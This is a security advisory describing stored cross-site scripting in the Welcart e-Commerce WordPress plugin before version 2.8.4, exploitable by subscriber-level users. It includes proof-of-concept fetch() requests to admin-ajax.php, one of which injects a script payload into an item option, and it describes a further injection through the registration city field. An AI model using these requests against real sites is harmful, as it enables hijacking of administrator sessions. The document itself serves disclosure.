Welcart e-Commerce < 2.8.4 - Multiple Subscriber+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks

PoC

add new payment method with XSS exploit: fetch(‘http://localhost/tester-wp/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=payment_ajax&newname;=XSS+Payment&newexplanation;=&newsettlement;=acting&newmodule;=payment_module’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error)); The exploit requires at least a subscriber role. The alert script displayed on the 3. Shipping and Payment tab on the shopping cart page. Cart URL: http://localhost/usces-cart/ -– add item option with XSS exploit: fetch(‘http://localhost/tester-wp/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=item_option_ajax&ID;=100&update;=1&optname;=radio_button&optvalue;=%3Cscript%3Ealert(%22radio+button+option+XSS%22)%3C%2Fscript%3E&optmeans;=1&optessential;=1&sort;=0&optmetaid;=1’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error)); If we want to add it as a common option, the ID will be the Cart page id (#100 cart page id). This post id is public data. Then, if the admin selects the option from the list in the “options for items” metabox when editing the product, the script will run. -– User registration is XSS vulnerable. Add a product to the cart, then go to the cart: http://localhost/usces-cart/ Enter the following code for the city: "> The edit fields are escaped on the admin (for example on user edit page, or order edit page), so the alert script is not displayed. However, if the admin makes changes to the user, the script is added to the log, and the output from the log no longer the escaped, so the alert script runs. In this case, an admin reaction to the XSS exploit is required.